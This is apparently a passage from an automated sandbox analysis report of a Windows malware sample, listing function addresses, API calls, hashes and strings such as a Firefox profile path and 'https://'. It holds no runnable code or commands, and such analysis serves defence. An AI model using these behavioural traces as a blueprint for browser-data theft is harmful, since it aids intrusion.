  • Opcode Fuzzy Hash: 97F02461CA2887A7900B446974553AEDA116F416C9D4C0B62ED412814EAF0732E6EB4A
  • Instruction Fuzzy Hash: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C713F
  • memset.NTDLL ref: 001C715C
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C7178
  • GetDriveTypeW.KERNEL32(?), ref: 001C7186
  • lstrlenW.KERNEL32(?), ref: 001C7192
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • lstrlenW.KERNEL32(?), ref: 001C71BF
  • HeapFree.KERNEL32(00000000,?), ref: 001C71D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6DF6, Relevance: 10.6, APIs: 7, Instructions: 90 Total matches: 57filesynchronization
Similarity
  • Total matches: 57
  • API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile
  • String ID:
  • API String ID: 1310882240-0
  • Opcode ID: 428b72d32063ac54d5b905598191ac261dcad3cf285b84f146690d990cf327a1
  • Instruction ID: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
  • Opcode Fuzzy Hash: CAF02BA0515DC14BC217346516727BFD904EB425C5E4C7372A840420494F06769BAB5A
  • Instruction Fuzzy Hash: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
APIs
  • GetLastError.KERNEL32 ref: 001D6E41
  • WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
  • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
  • SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
  • GetLastError.KERNEL32 ref: 001D6EDD
  • CloseHandle.KERNEL32(00000006), ref: 001D6EE9
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBD48, Relevance: 10.6, APIs: 7, Instructions: 89 Total matches: 58memorystringpipe
Similarity
  • Total matches: 58
  • API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 1038157847-0
  • Opcode ID: 6bb6ae630451ca86ee9df0719d803bcc4810f9cd3f6b8a390704e6ae44b564aa
  • Instruction ID: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
  • Opcode Fuzzy Hash: 73F05990085A81D2C123B42951217FFF194BEC02DBCDEA772E8E21885E2E0162A06B5D
  • Instruction Fuzzy Hash: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
APIs
  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
  • memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
  • memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • GetLastError.KERNEL32 ref: 001CBE07
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C79A7, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87 Total matches: 56memoryfilestring
Similarity
  • Total matches: 56
  • API ID: HeapFree$DeleteFileStrTrimlstrlen
  • String ID: ss: *.*.*.*
  • API String ID: 1870149019-856079725
  • Opcode ID: 59ebdf1013b10810b54038a6e3da88a7dec1c4f015ef1646412946d67e45a806
  • Instruction ID: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
  • Opcode Fuzzy Hash: ECF09E21084D41AF8937286A50607F50915FB804F1C4DCFB7AC857B2857F836228BB4B
  • Instruction Fuzzy Hash: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C79CB
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • StrTrimA.SHLWAPI(00000000,001E53D4), ref: 001C7A55
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7A72
  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • HeapFree.KERNEL32(00000000,00000000,001ECE60), ref: 001C7A89
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7D61, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: memcpy$RtlAllocateHeap
  • String ID: [URL]$https://
  • API String ID: 3738462082-2839221783
  • Opcode ID: afc151603a67bdcf01d5cf8a846d0f5f8a912d4aa94ead1b687b7b5f553c7413
  • Instruction ID: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
  • Opcode Fuzzy Hash: 21E02B245D1F02D6D85A20845438BB7C6873D42394CAE7766C950255772A25B174B588
  • Instruction Fuzzy Hash: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
APIs
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
  • memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
  • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
  • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C771B, Relevance: 10.6, APIs: 7, Instructions: 71 Total matches: 62memoryfilestring
Similarity
  • Total matches: 62
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs
  • String ID:
  • API String ID: 1841334458-0
  • Opcode ID: 88abf7bf9e6c094b0eee3fb77fa4d18763972b4349be3218ed9dbfc152fe13ca
  • Instruction ID: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
  • Opcode Fuzzy Hash: 2BE02B71181D5096C02719A68C58339E6056F422E4E5D4627FA013910FB24317E8EBAB
  • Instruction Fuzzy Hash: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C7527: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001C75DB
    • Part of subcall function 001C7527: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C75FC
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
  • lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
  • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
  • mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C7B90: GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
    • Part of subcall function 001C7B90: memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
    • Part of subcall function 001C7B90: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
    • Part of subcall function 001C7B90: lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7B90: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
  • CloseHandle.KERNEL32(?), ref: 001C77C0
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2416, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 50memorystringthread
Similarity
  • Total matches: 50
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 1766977795-0
  • Opcode ID: b41ce86395a358d9a6be2e887350fb16e7ee7d04885f28ea6336c7c9663497fb
  • Instruction ID: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
  • Opcode Fuzzy Hash: A8E026A5068C0583807778228061BAF9B82BAC10D8C8D7123FE402614B2F037487DF2B
  • Instruction Fuzzy Hash: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
APIs
  • lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
  • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
  • lstrcpy.KERNEL32(00000008,?), ref: 001C2462
  • CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
  • CloseHandle.KERNEL32(00000000), ref: 001C2485
  • GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C5C23, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59 Total matches: 27stringtime
Similarity
  • Total matches: 27
  • API ID: lstrcmpi$GetSystemTimeAsFileTimeRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID: Main
  • API String ID: 3521027233-521822810
  • Opcode ID: bc401ce39ed135578d671bff3c7e0c2395a673578b9a283240c4e40e0584cd5d
  • Instruction ID: 21906b460c7dcbc5898723b16b272b466b629f8a7c325451b17217bd0ccc14f7
  • Opcode Fuzzy Hash: 10E02B34084403D7901B60A90C06F18DE4EF3603C8CCE2A65C41129A061B56326E2F3B
  • Instruction Fuzzy Hash: 21906b460c7dcbc5898723b16b272b466b629f8a7c325451b17217bd0ccc14f7
APIs
  • lstrcmpi.KERNEL32(00000000,Main), ref: 001C5C44
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5C56
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5C69
  • lstrcmpi.KERNEL32(001EB260,00000000), ref: 001C5C8A
  • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,?,001C9732,00000000), ref: 001C5C9E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4EEE, Relevance: 9.2, APIs: 6, Instructions: 187 Total matches: 61memorystringthread
Similarity
  • Total matches: 61
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf
  • String ID:
  • API String ID: 236900386-0
  • Opcode ID: 0432ee343612a59173c04e27a8b524be30c23a17c6314db2962a76565d5ddb3c
  • Instruction ID: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
  • Opcode Fuzzy Hash: F7119B31058EC2A7441760C18092BBED450FC920E580D37F2EEB86A2CE6F43258B2B1B
  • Instruction Fuzzy Hash: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
APIs
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
    • Part of subcall function 001D829C: lstrlen.KERNEL32(?,00000000,001EABBC,?,001C194F,?), ref: 001D82A6
    • Part of subcall function 001D829C: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 001D82D1
    • Part of subcall function 001D829C: lstrcat.KERNEL32(00000000,?), ref: 001D8317
  • lstrcmp.KERNEL32(?,?), ref: 001C4F65
  • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
  • GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C1916: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C192A
    • Part of subcall function 001C1916: RegCloseKey.ADVAPI32(?), ref: 001C1958
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
  • wsprintfA.USER32 ref: 001C50B7
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C8CA3, Relevance: 9.1, APIs: 6, Instructions: 72 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: HeapFreelstrlen$mbstowcswcstombs
  • String ID:
  • API String ID: 2099024402-0
  • Opcode ID: e75e910ff2ec0d94baf6de8394c43fdc3fb5dca6cdb9e0b5bf2cf534734101ee
  • Instruction ID: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
  • Opcode Fuzzy Hash: 88E02BB20C04C297060710B3847577DDA09BCC21D100E53ABDB08EC34DA68723A5BB6F
  • Instruction Fuzzy Hash: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
APIs
  • lstrlenW.KERNEL32(?), ref: 001C8CC7
  • wcstombs.NTDLL ref: 001C8CE7
    • Part of subcall function 001C8B4E: RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,?,?), ref: 001C8C27
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
  • lstrlen.KERNEL32(00000000), ref: 001C8D0B
  • mbstowcs.NTDLL ref: 001C8D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D3F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D59
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C6C08, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 141 Total matches: 19registrysynchronization
Similarity
  • Total matches: 19
  • API ID: RegCloseKeyRegOpenKeySetEventWaitForSingleObject
  • String ID: %APPDATA%\Mozilla\Firefox\Profiles
  • API String ID: 2346524515-3215297822
  • Opcode ID: 04e48ca811839595ab19984103b0a713a9098f9930145295782b9b8a8acae543
  • Instruction ID: effeb2e01b4a51d3d610c8b01d7388b0104aa6fb8cbfa1868068c1e0be09bfdc
  • Opcode Fuzzy Hash: 64110C72556761C8C9256C84281E37A35C3FA833D3D2C7703EDA071A8B4B8261ECBD98
  • Instruction Fuzzy Hash: effeb2e01b4a51d3d610c8b01d7388b0104aa6fb8cbfa1868068c1e0be09bfdc
APIs
    • Part of subcall function 001D83A0: GetProcAddress.KERNEL32(001ED992,001C6C3C,00000000), ref: 001D83B4
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
    • Part of subcall function 001C3996: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001C3996: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
    • Part of subcall function 001C3996: GetLastError.KERNEL32 ref: 001C3A9B
    • Part of subcall function 001C3996: HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
    • Part of subcall function 001C3996: RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
  • SetEvent.KERNEL32(00000001,001EB1D0,?,00000000), ref: 001C6C91
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • WaitForSingleObject.KERNEL32(00000000,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C6D1E
  • RegOpenKeyA.ADVAPI32(80000001,001EC992,?), ref: 001C6D4F
  • RegCloseKey.ADVAPI32(?), ref: 001C6D77
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
    • Part of subcall function 001D9029: NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 001D905A
    • Part of subcall function 001D9029: RtlNtStatusToDosError.NTDLL(C000009A), ref: 001D9095
    • Part of subcall function 001D6D18: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
    • Part of subcall function 001D6D18: GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001D6D18: ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
    • Part of subcall function 001D6D18: GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
    • Part of subcall function 001D6D18: CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
Strings
  • %APPDATA%\Mozilla\Firefox\Profiles, xrefs: 001C6CA7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C838C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102 Total matches: 54memory
Similarity
  • Total matches: 54
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: https://
  • API String ID: 3817218409-4275131719
  • Opcode ID: f288712f8a6e8bd0bf07739e93ef791456e10643a80339435031cd9f7b6ed460
  • Instruction ID: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
  • Opcode Fuzzy Hash: 18F08B601A85C2A6802718C294AC7B2C604BE80AC0D8D536FFF503929E5FA770D5BB0A
  • Instruction Fuzzy Hash: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
APIs
    • Part of subcall function 001C5ADD: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5AEB
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3F95, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80 Total matches: 37memorystring
Similarity
  • Total matches: 37
  • API ID: HeapFree$RtlAllocateHeaplstrcmpi
  • String ID: Main
  • API String ID: 2523190637-521822810
  • Opcode ID: f2d70ba1db336b0a4ac6973dd472b45d7992a95be766767dbdcbf8c120d66562
  • Instruction ID: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
  • Opcode Fuzzy Hash: 8DF095610946C3D35417545580B03B89004AFD22F2C4D43FAE9303D1CB7E1235D7765F
  • Instruction Fuzzy Hash: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
APIs
    • Part of subcall function 001DDAD4: memcpy.NTDLL(00000000,00000084,00000084,001CD4DC,00000000,00000000,001DDB4C,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001), ref: 001DDAF2
    • Part of subcall function 001DDAD4: memset.NTDLL ref: 001DDB24
  • RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
  • lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C5816: lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
    • Part of subcall function 001C5816: HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
    • Part of subcall function 001C5816: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
    • Part of subcall function 001C5816: lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
    • Part of subcall function 001C5816: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
    • Part of subcall function 001C5816: Sleep.KERNEL32(0000000A), ref: 001C58F2
    • Part of subcall function 001C5816: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C3F4D: RegCloseKey.ADVAPI32(?,?,?,001C403B,00000000,?,?,00000000,00000000,-00000008), ref: 001C3F87
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4202, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63 Total matches: 53memoryregistry
Similarity
  • Total matches: 53
  • API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap
  • String ID: Main
  • API String ID: 1238789381-521822810
  • Opcode ID: 430bf3c3e099aaf98ba0d13378e5d8da2de179d3274a2f5d09db6df723472999
  • Instruction ID: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
  • Opcode Fuzzy Hash: CAE026B00A45C5AA403B7C81647B2F29410F9A08C20CD976BEE009F28CAE4670A27B9A
  • Instruction Fuzzy Hash: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
APIs
  • RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
  • HeapFree.KERNEL32(00000000,?), ref: 001C428F
